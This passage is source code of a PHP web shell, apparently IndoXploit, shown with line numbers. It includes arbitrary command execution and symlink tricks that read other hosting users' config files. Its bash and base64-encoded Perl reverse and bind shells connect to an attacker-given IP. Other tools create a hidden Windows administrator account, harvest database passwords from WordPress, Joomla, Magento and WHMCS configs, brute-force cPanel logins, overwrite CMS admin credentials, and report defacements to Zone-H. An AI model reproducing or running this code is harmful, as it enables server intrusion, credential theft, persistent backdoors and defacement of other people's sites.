	{configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' }
);
foreach (@array){
	my $confignya = $_->{configdir};
	my $typeconfig = $_->{type};
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt");
	mkdir "idx_sym/$usernya-$typeconfig.txt";
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt/0x1999.txt");
	copy("idx_sym/nemu.txt","idx_sym/$usernya-$typeconfig.txt/.htaccess") ;
	}
}
print "Content-type: text/html\n\n";
print "<head><title>Bypass 404 By 0x1999</title></head>";
print '<meta http-equiv="refresh" content="5; url=idx_sym"/>';
print '<body><center><h1>0x1999 Never Die</h1>';
print '<a href="idx_sym">Klik Disini</a>';
unlink($0);";
  995.             save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
  996.             exe("perl /tmp/symlink.pl");
  997.             sleep(1);
  998.             @unlink("/tmp/symlink.pl");
  999.             @unlink("passwd.txt");
  1000.             @unlink("idx_sym/pas.txt");
  1001.             @unlink("idx_sym/nemu.txt");
  1002.         }
  1003.  
  1004.         print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  1005.         print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
  1006.         print "</div>";
  1007.     }
  1008.     elseif($toolsname === "network") {
  1009.         $args = explode(" ", $args);
  1010.  
  1011.         if($args[0] === "bc") {
  1012.             if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
  1013.             if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
  1014.             if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  1015.  
  1016.             if($args[3] === "bash") {
  1017.                 exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
  1018.             }
  1019.             elseif($args[3] === "perl") {
  1020.                 $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1021.                 save("/tmp/bc.pl", "w", base64_decode($bc['code']));
  1022.                 $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
  1023.                 sleep(1);
  1024.                 print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
  1025.                 @unlink("/tmp/bc.pl");
  1026.             }
  1027.         }
  1028.         elseif($args[0] === "bp") {
  1029.             if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
  1030.             if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  1031.  
  1032.             if($args[2] === "perl") {
  1033.                 $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1034.                 save("/tmp/bp.pl", "w", base64_decode($bp['code']));
  1035.                 $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
  1036.                 sleep(1);
  1037.                 print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
  1038.                 @unlink("/tmp/bp.pl");
  1039.             }
  1040.         }
  1041.         else {
  1042.             print color(1, 1, "Unknown '".$args[0]."'");
  1043.         }
  1044.     }
  1045.     elseif($toolsname === "krdp") {
  1046.         $args = explode(" ", $args);
  1047.  
  1048.         if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
  1049.         if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));
  1050.  
  1051.         $add_user   = exe("net user indoxploit indoxploit /add");
  1052.         $add_groups1 = exe("net localgroup Administrators indoxploit /add");
  1053.         $add_groups2 = exe("net localgroup Administrator indoxploit /add");
  1054.         $add_groups3 = exe("net localgroup Administrateur indoxploit /add");
  1055.  
  1056.         print "[ RDP ACCOUNT INFO ]<br>
  1057.         ------------------------------<br>
  1058.         IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
  1059.         Username: ".color(1, 2, "indoxploit")."<br>
  1060.         Password: ".color(1, 2, "indoxploit")."<br>
  1061.         ------------------------------<br><br>
  1062.         [ STATUS ]<br>
  1063.         ------------------------------<br>
  1064.         ";
  1065.  
  1066.         if($add_user) {
  1067.             print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
  1068.         }
  1069.         else {
  1070.             print "[add user] -> ".color(1, 1, "FAILED")."<br>";
  1071.         }
  1072.        
  1073.         if($add_groups1) {
  1074.             print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
  1075.         }
  1076.         elseif($add_groups2) {
  1077.             print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
  1078.         }
  1079.         elseif($add_groups3) {
  1080.             print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
  1081.         }
  1082.         else {
  1083.             print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
  1084.         }
  1085.  
  1086.         print "------------------------------<br>";
  1087.     }
  1088. }
  1089.  
  1090. function files_and_folder() {
  1091.     if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists."));
  1092.     if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable."));
  1093.     print '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1094.            <tr>
  1095.            <th class="th_home"><center>Name</center></th>
  1096.            <th class="th_home"><center>Type</center></th>
  1097.            <th class="th_home"><center>Size</center></th>
  1098.            <th class="th_home"><center>Last Modified</center></th>
  1099.            <th class="th_home"><center>Owner/Group</center></th>
  1100.            <th class="th_home"><center>Permission</center></th>
  1101.            <th class="th_home"><center>Action</center></th>
  1102.            </tr>';
  1103.  
  1104.     if(function_exists('opendir')) {
  1105.         if($opendir = opendir(path())) {
  1106.             while(($readdir = readdir($opendir)) !== false) {
  1107.                 $dir[] = $readdir;
  1108.             }
  1109.             closedir($opendir);
  1110.         }
  1111.         sort($dir);
  1112.     } else {
  1113.         $dir = scandir(path());
  1114.     }
  1115.  
  1116.     foreach($dir as $folder) {
  1117.         $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder;
  1118.         if(!is_dir($dirinfo['path'])) continue;
  1119.         $dirinfo['type']  = filetype($dirinfo['path']);
  1120.         $dirinfo['time']  = date("F d Y g:i:s", filemtime($dirinfo['path']));
  1121.         $dirinfo['size']  = "-";
  1122.         $dirinfo['perms'] = writeable($dirinfo['path'], perms($dirinfo['path']));
  1123.         $dirinfo['link']  = ($folder === ".." ? "<a href='?dir=".dirname(path())."'>$folder</a>" : ($folder === "." ?  "<a href='?dir=".path()."'>$folder</a>" : "<a href='?dir=".$dirinfo['path']."'>$folder</a>"));
  1124.         $dirinfo['action']= ($folder === '.' || $folder === '..') ? "<a href='?act=newfile&dir=".path()."'>newfile</a> | <a href='?act=newfolder&dir=".path()."'>newfolder</a>" : "<a href='?act=rename_folder&dir=".$dirinfo['path']."'>rename</a> | <a href='?act=delete_folder&dir=".$dirinfo['path']."'>delete</a>";
  1125.         if(function_exists('posix_getpwuid')) {
  1126.             $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path']));
  1127.             $dirinfo['owner'] = $dirinfo['owner']->name;
  1128.         } else {
  1129.             $dirinfo['owner'] = fileowner($dirinfo['path']);
  1130.         }
  1131.         if(function_exists('posix_getgrgid')) {
  1132.             $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path']));
  1133.             $dirinfo['group'] = $dirinfo['group']->name;
  1134.         } else {
  1135.             $dirinfo['group'] = filegroup($dirinfo['path']);
  1136.         }
  1137.         print "<tr>";
  1138.         print "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>".$dirinfo['link']."</td>";
  1139.         print "<td class='td_home' style='text-align: center;'>".$dirinfo['type']."</td>";
  1140.         print "<td class='td_home' style='text-align: center;'>".$dirinfo['size']."</td>";
  1141.         print "<td class='td_home' style='text-align: center;'>".$dirinfo['time']."</td>";
  1142.         print "<td class='td_home' style='text-align: center;'>".$dirinfo['owner'].DIRECTORY_SEPARATOR.$dirinfo['group']."</td>";
  1143.         print "<td class='td_home' style='text-align: center;'>".$dirinfo['perms']."</td>";
  1144.         print "<td class='td_home' style='padding-left: 15px;'>".$dirinfo['action']."</td>";
  1145.         print "</tr>";
  1146.     }
  1147.     foreach($dir as $files) {
  1148.         $fileinfo['path'] = path().DIRECTORY_SEPARATOR.$files;
  1149.         if(!is_file($fileinfo['path'])) continue;
  1150.         $fileinfo['type'] = filetype($fileinfo['path']);
  1151.         $fileinfo['time'] = date("F d Y g:i:s", filemtime($fileinfo['path']));
  1152.         $fileinfo['size'] = filesize($fileinfo['path'])/1024;
  1153.         $fileinfo['size'] = round($fileinfo['size'],3);
  1154.         $fileinfo['size'] = ($fileinfo['size'] > 1024) ? round($fileinfo['size']/1024,2). "MB" : $fileinfo['size']. "KB";
  1155.         $fileinfo['perms']= writeable($fileinfo['path'], perms($fileinfo['path']));
  1156.         if(function_exists('posix_getpwuid')) {
  1157.             $fileinfo['owner'] =  (object) @posix_getpwuid(fileowner($fileinfo['path']));
  1158.             $fileinfo['owner'] = $fileinfo['owner']->name;
  1159.         } else {
  1160.             $fileinfo['owner'] = fileowner($fileinfo['path']);
  1161.         }
  1162.         if(function_exists('posix_getgrgid')) {
  1163.             $fileinfo['group'] = (object) @posix_getgrgid(filegroup($fileinfo['path']));
  1164.             $fileinfo['group'] = $fileinfo['group']->name;
  1165.         } else {
  1166.             $fileinfo['group'] = filegroup($fileinfo['path']);
  1167.         }
  1168.         print "<tr>";
  1169.         print "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=".path()."&file=".$fileinfo['path']."'>$files</a></td>";
  1170.         print "<td class='td_home' style='text-align: center;'>".$fileinfo['type']."</td>";
  1171.         print "<td class='td_home' style='text-align: center;'>".$fileinfo['size']."</td>";
  1172.         print "<td class='td_home' style='text-align: center;'>".$fileinfo['time']."</td>";
  1173.         print "<td class='td_home' style='text-align: center;'>".$fileinfo['owner'].DIRECTORY_SEPARATOR.$fileinfo['group']."</td>";
  1174.         print "<td class='td_home' style='text-align: center;'>".$fileinfo['perms']."</td>";
  1175.         print "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=".path()."&file=".$fileinfo['path']."'>edit</a> | <a href='?act=rename&dir=".path()."&file=".$fileinfo['path']."'>rename</a> | <a href='?act=delete&dir=".path()."&file=".$fileinfo['path']."'>delete</a> | <a href='?act=download&dir=".path()."&file=".$fileinfo['path']."'>download</a></td>";
  1176.         print "</tr>";
  1177.     }
  1178.  
  1179.     print "</table>";
  1180.     print "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'>".color(1, 2, "IndoXploit")."</a></center>";
  1181. }
  1182.  
  1183.  
  1184. function action() {
  1185.     tools("upload");
  1186.     tools("cmd");
  1187.     print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1188.     print "<center>";
  1189.     print "<ul>";
  1190.     print "<li>[ <a href='?'>Home</a> ]</li>";
  1191.     print "<li>[ <a href='?dir=".path()."&do=fakeroot'>Fake Root</a> ]</li>";
  1192.     print "<li>[ <a href='?dir=".path()."&do=cpanel'>cPanel Crack</a> ]</li>";
  1193.     print "<li>[ <a href='?dir=".path()."&do=mpc'>Mass Password Change</a> ]</li>";
  1194.     print "<li>[ <a href='?dir=".path()."&do=mass'>Mass Deface/Delete</a> ]</li>";
  1195.     print "<li>[ <a href='?dir=".path()."&do=lre'>Local Root Exploiter</a> ]</li>";
  1196.     print "<li>[ <a href='?dir=".path()."&do=zoneh'>Zone-H</a> ]</li>";
  1197.     print "</ul>";
  1198.     print "</center>";
  1199.     print "<hr style='margin-top: 15px; margin-bottom: 10px;'>";
  1200.  
  1201.  
  1202.     if(isset($_GET['do'])) {
  1203.         if($_GET['do'] === "cmd") {
  1204.             if(isset($_POST['cmd'])) {
  1205.                 if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) {
  1206.                     tools("readfile", $match[1]);
  1207.                 }
  1208.                 elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) {
  1209.                     tools("spawn", $match[1]);
  1210.                 }
  1211.                 elseif(preg_match("/^symlink$/", $_POST['cmd'], $match)) {
  1212.                     tools("symlink");
  1213.                 }
  1214.                 elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) {
  1215.                     tools("network", $match[1]);
  1216.                 }
  1217.                 elseif(preg_match("/^krdp$/", $_POST['cmd'])) {
  1218.                     tools("krdp");
  1219.                 }
  1220.                 elseif(preg_match("/^jumping$/", $_POST['cmd'])) {
  1221.                     tools("jumping");
  1222.                 }
  1223.                 elseif(preg_match("/^idxconfig$/", $_POST['cmd'])) {
  1224.                     tools("idxconfig");
  1225.                 }
  1226.                 elseif(preg_match("/^logout$/", $_POST['cmd'])) {
  1227.                     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1228.                     print "<script>window.location='?';</script>";
  1229.                 }
  1230.                 elseif(preg_match("/^killme$/", $_POST['cmd'])) {
  1231.                     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1232.                     @unlink(__FILE__);
  1233.                     print "<script>window.location='?';</script>";
  1234.                 }
  1235.                 else {
  1236.                     print "<pre>".exe($_POST['cmd'])."</pre>";
  1237.                 }
  1238.             }
  1239.             else {
  1240.                 files_and_folder();
  1241.             }
  1242.         }
  1243.         elseif($_GET['do'] === "zoneh") {
  1244.             if(isset($_POST['submit']) AND $_GET['do'] === "zoneh") {
  1245.                 $nick   = $_POST['nick'];
  1246.                 $domain = explode("\r\n", $_POST['url']);
  1247.  
  1248.                 print "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1249.                 print "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1250.    
  1251.                 foreach($domain as $no => $url) {
  1252.                     $no   = ($no+1).".";
  1253.                     $post = curl("http://www.zone-h.org/notify/single", TRUE, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1254.                     if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $post)) {
  1255.                         print "$no $url -> ".color(1, 2, "OK")."<br>";
  1256.                     } else {
  1257.                         print "$no $url -> ".color(1, 1, "ERROR")."<br>";
  1258.                     }
  1259.                 }
  1260.             }
  1261.             else {
  1262.                 print "<center><form method='post' action='?do=zoneh&dir=".path()."'>
  1263.                        Defacer: <br>
  1264.                        <input type='text' name='nick' size='50' value='IndoXploit'><br><br>
  1265.                        Domains: <br>
  1266.                        <textarea style='width: 450px; height: 150px;' name='url' placeholder='http://google.com/'></textarea><br>
  1267.                        <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='submit' value='Submit'>
  1268.                        </form></center>";
  1269.             }
  1270.         }
  1271.         elseif($_GET['do'] == 'cpanel') {
  1272.             if($_POST['crack']) {
  1273.                 $usercp = explode("\r\n", $_POST['user_cp']);
  1274.                 $passcp = explode("\r\n", $_POST['pass_cp']);
  1275.                 $i = 0;
  1276.                 foreach($usercp as $ucp) {
  1277.                     foreach($passcp as $pcp) {
  1278.                         $connect = mysql_connect('localhost', $ucp, $pcp);
  1279.                         if($connect) {
  1280.                             if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1281.                             } else {
  1282.                                 $_SESSION[$ucp] = "1";
  1283.                                 $_SESSION[$pcp] = "1";
  1284.                                 if($ucp === '' || $pcp === '') {
  1285.                                     //
  1286.                                 } else {
  1287.                                     $i++;
  1288.                                     print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
  1289.                                     if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
  1290.                                     if(!getdomainname()) print color(1, 1, "Can't get domain name");
  1291.                                     foreach(getdomainname() as $domain) {
  1292.                                         $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  1293.                                         $userdomain = $userdomain->name;
  1294.                                         if($userdomain === $user) {
  1295.                                             print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
  1296.                                             break;
  1297.                                         }
  1298.                                     }
  1299.                                     print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
  1300.                                     print ")<br>";
  1301.                                 }
  1302.                             }
  1303.                             mysql_close($connect);
  1304.                         }
  1305.                     }
  1306.                 }
  1307.                 print ($i === 0) ? "" : "<p>".color(1, 3, "Sukses nyolong $i Cpanel by IndoXploit")."</p>";
  1308.             } else {
  1309.                 print "<center>
  1310.                        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1311.                        <form method='post'>
  1312.                        USER: <br>
  1313.                        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1314.                 print implode("\n", getuser());
  1315.                 print "</textarea><br>
  1316.                        PASS: <br>
  1317.                        <span>Grab Password from Link Config:</span><br>
  1318.                        <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='http://web.com/idx_config/'>
  1319.                        <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
  1320.                        <br>
  1321.                        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1322.  
  1323.                 if(isset($_POST['submitlink'])) {
  1324.                     $getpass = $_POST['linkpass'];
  1325.                     $get = curl($_POST['linkpass']);
  1326.                     preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1327.                     foreach($link[1] as $link_config) {
  1328.                         $scandir[] = "$link_config.txt";
  1329.                     }
  1330.                 }
  1331.                 else {
  1332.                     $getpass = path();
  1333.                     $scandir = scandir($getpass);
  1334.                 }
  1335.  
  1336.                 $password = "";
  1337.  
  1338.                 foreach($scandir as $files) {
  1339.                     $file = "$getpass/$files";
  1340.                     $config = file_get_contents($file);
  1341.                     if(preg_match("/WordPress/", $config)) {
  1342.                         $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
  1343.                     }
  1344.                     elseif(preg_match("/JConfig|joomla/", $config)) {
  1345.                         $password .= getValue($config, "password = '", "'")."\n";
  1346.                     }
  1347.                     elseif(preg_match("/Magento|Mage_Core/", $config)) {
  1348.                         $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
  1349.                     }
  1350.                     elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
  1351.                         $password .= getValue($config, 'password = "', '"')."\n";
  1352.                     }
  1353.                     elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
  1354.                         $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
  1355.                     }
  1356.                     elseif(preg_match("/^[client]$/", $config)) {
  1357.                         preg_match("/password=(.*?)/", $config, $pass);
  1358.                         if(preg_match('/"/', $pass[1])) {
  1359.                             $pass[1] = str_replace('"', "", $pass[1]);
  1360.                             $password .= $pass[1]."\n";
  1361.                         }
  1362.                         else {
  1363.                             $password .= $pass[1]."\n";
  1364.                         }
  1365.                     }
  1366.                     elseif(preg_match("/cc_encryption_hash/", $config)) {
  1367.                         $password .= getValue($config, "db_password = '", "'")."\n";
  1368.                     }
  1369.                 }
  1370.  
  1371.                 print $password;
  1372.  
  1373.                 print "</textarea><br>
  1374.                        <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
  1375.                        </form></center>";
  1376.             }
  1377.         }
  1378.         elseif($_GET['do'] == 'mpc') {
  1379.             if($_POST['hajar']) {
  1380.                 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1381.                     print "username atau password harus lebih dari 6 karakter";
  1382.                 }
  1383.                 else {
  1384.                     $user_baru = $_POST['user_baru'];
  1385.                     $pass_baru = md5($_POST['pass_baru']);
  1386.                     $conf = $_POST['config_dir'];
  1387.  
  1388.                     if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) {
  1389.                         $get = curl($conf);
  1390.                         preg_match_all('/<a href="(.*?).txt">/', $get, $link);
  1391.                         foreach($link[1] as $link_config) {
  1392.                             $scan_conf[] = "$link_config.txt";
  1393.                         }
  1394.                     }
  1395.                     else {
  1396.                         $scan_conf = scandir($conf);
  1397.                     }
  1398.  
  1399.                     foreach($scan_conf as $file_conf) {
  1400.                         $config = file_get_contents("$conf/$file_conf");
  1401.                         if(preg_match("/JConfig|joomla/",$config)) {
  1402.                             $dbhost = getValue($config,"host = '","'");
  1403.                             $dbuser = getValue($config,"user = '","'");
  1404.                             $dbpass = getValue($config,"password = '","'");
  1405.                             $dbname = getValue($config,"db = '","'");
  1406.                             $dbprefix = getValue($config,"dbprefix = '","'");
  1407.                             $prefix = $dbprefix."users";
  1408.                             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1409.                             $db = mysql_select_db($dbname);
  1410.                             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1411.                             $result = mysql_fetch_array($q);
  1412.                             $id = $result['id'];
  1413.                             $site = getValue($config,"sitename = '","'");
  1414.                             $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1415.                             print "Config => ".$file_conf."<br>";
  1416.                             print "CMS => Joomla<br>";
  1417.                             if($site == '') {
  1418.                                 print "Sitename => ".color(1, 1, "Can't get domain name")."<br>";
  1419.                             }
  1420.                             else {
  1421.                                 print "Sitename => $site<br>";
  1422.                             }
  1423.                             if(!$update OR !$conn OR !$db) {
  1424.                                 print "Status => ".color(1, 1, mysql_error())."<br><br>";
  1425.                             }
  1426.                             else {
  1427.                                 print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."<br><br>";
  1428.                             }
  1429.                             mysql_close($conn);
  1430.                         } elseif(preg_match("/WordPress/",$config)) {
  1431.                             $dbhost = getValue($config,"DB_HOST', '","'");
  1432.                             $dbuser = getValue($config,"DB_USER', '","'");
  1433.                             $dbpass = getValue($config,"DB_PASSWORD', '","'");
  1434.                             $dbname = getValue($config,"DB_NAME', '","'");
  1435.                             $dbprefix = getValue($config,"table_prefix  = '","'");
  1436.                             $prefix = $dbprefix."users";
  1437.                             $option = $dbprefix."options";
  1438.                             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1439.                             $db = mysql_select_db($dbname);
  1440.                             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1441.                             $result = mysql_fetch_array($q);
  1442.                             $id = $result[ID];
  1443.                             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1444.                             $result2 = mysql_fetch_array($q2);
  1445.                             $target = $result2[option_value];
  1446.                             if($target == '') {
  1447.                                 $url_target = "Login => ".color(1, 1, "Cant't get domain name")."<br>";
  1448.                             }
  1449.                             else {
